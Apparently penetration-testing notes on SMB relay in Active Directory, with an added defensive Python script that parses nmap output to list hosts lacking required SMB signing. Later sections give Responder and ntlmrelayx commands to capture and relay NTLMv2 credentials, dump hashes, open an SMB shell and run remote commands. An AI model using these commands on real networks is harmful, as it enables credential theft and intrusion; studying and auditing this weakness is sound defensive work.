SMB Relay (Internal/External)
Note: Network Environment
This attack works best in a flat network. However, as long as the attacker machine and target(s) are routable and no firewalls are blocking the required ports, it can work across network segments.
What is SMB Relay?
A man-in-the-middle may receive user NTLM authentication credentials, which, once received, can be relayed to other host(s) on the network in an attempt to authenticate as said user(s).
What's the Flaw?
Many Active Directory networks are configured in such a way that SMB message signing is not enabled -- which is the default configuration on client machines. It is always enabled on servers and domain controllers.
Detecting SMB Signing Mode
sudo nmap --script=smb2-security-mode -p445 target(s)
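The nmap script above prints one "Message signing ..." line per host. The following is an added example (not part of the original notes) that parses saved nmap output (for instance from `-oN`) and lists the hosts where signing is not required, so a defender can build a remediation list rather than reading the scan by hand. The hostnames, addresses and the scan text are constructed; the assumption is that the message strings match those the smb2-security-mode NSE script emits ("enabled and required", "enabled but not required", "is disabled ...").

```python
import re
import sys
from typing import Dict

# Constructed sample: normal-format output of
#   nmap --script=smb2-security-mode -p445 <targets>
# for three made-up hosts. Message strings are assumed to match the NSE script.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for ws01.corp.example (10.0.0.21)
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for dc01.corp.example (10.0.0.10)
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for nas01.corp.example (10.0.0.40)
Host is up (0.0020s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2.1:
|_    Message signing is disabled and not required!
"""

# "Nmap scan report for <name> (<ip>)" or "Nmap scan report for <ip>"
HOST_RE = re.compile(r"^Nmap scan report for (\S+)(?: \(([\d.]+)\))?")


def parse_signing_modes(nmap_text: str) -> Dict[str, dict]:
    """Return {host: {"dialect", "status", "signing_required"}} from nmap normal output."""
    results: Dict[str, dict] = {}
    current = None   # host currently being parsed (IP if shown, else name)
    dialect = None   # SMB2 dialect line preceding the signing message
    for line in nmap_text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(2) or m.group(1)
            dialect = None
            continue
        if current is None:
            continue
        # Strip the NSE output prefix ("| ", "|_   ") before inspecting the text.
        body = line.lstrip("|_ ").strip()
        if not body:
            continue
        if body.endswith(":") and body[:-1].replace(".", "").isdigit():
            dialect = body[:-1]          # e.g. "3.1.1" or "2.1"
        elif "Message signing" in body:
            results[current] = {
                "dialect": dialect,
                "status": body,
                # Only "enabled and required" protects against relay.
                "signing_required": "and required" in body,
            }
    return results


def hosts_needing_signing_enforced(nmap_text: str) -> list:
    """Hosts whose SMB signing is optional or disabled, sorted for a remediation list."""
    modes = parse_signing_modes(nmap_text)
    return sorted(h for h, r in modes.items() if not r["signing_required"])


if __name__ == "__main__":
    # Usage: python smb_signing_audit.py scan.nmap   (defaults to the built-in sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NMAP_OUTPUT
    for host, r in parse_signing_modes(text).items():
        flag = "OK " if r["signing_required"] else "FIX"
        print(f"{flag} {host:16} {r['dialect'] or '?':6} {r['status']}")
```

Hosts marked FIX are the ones a relay would succeed against; requiring signing on them (the domain controller in the sample already does) is the fix, and the audit can be re-run after the change to confirm every host reports "enabled and required".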
How is it Exploited?
Using a tool like responder, the attacker can listen for SMB client requests. If a client connects, the attacker will receive the user's NTLMv2 authentication credential -- username and NTLMv2 hash in cleartext.
Upon receiving the NTLMv2 authentication credential, the attacker can use a tool like ntlmrelayx.py to relay that credential to other host(s) on the network and attempt to authenticate as this user -- assuming this user is privileged to access resources on the other machines.
The Attack
Part 1: Responder
Various responder modules can be enabled/disabled in the configuration file: /etc/responder/Responder.conf
- Disable the HTTP server (ntlmrelayx hosts its own)
- Disable the SMB server (ntlmrelayx hosts its own)
sudo responder -I <interface-name> -dvw
Part 2a: ntlmrelayx (dump hashes)
sudo ntlmrelayx.py -tf <targets-file> -smb2support
Part 2b: ntlmrelayx (bind shell)
Opens an SMB shell that is forwarded through a socket on localhost
sudo ntlmrelayx.py -tf <targets-file> -smb2support -i
Once the shell is established, just use netcat to connect to the socket
nc 127.0.0.1 <port>
Then, we can issue commands to the SMB shell established on the target
Part 2c: ntlmrelayx (RCE)
sudo ntlmrelayx.py -tf <targets-file> -smb2support -c 'command'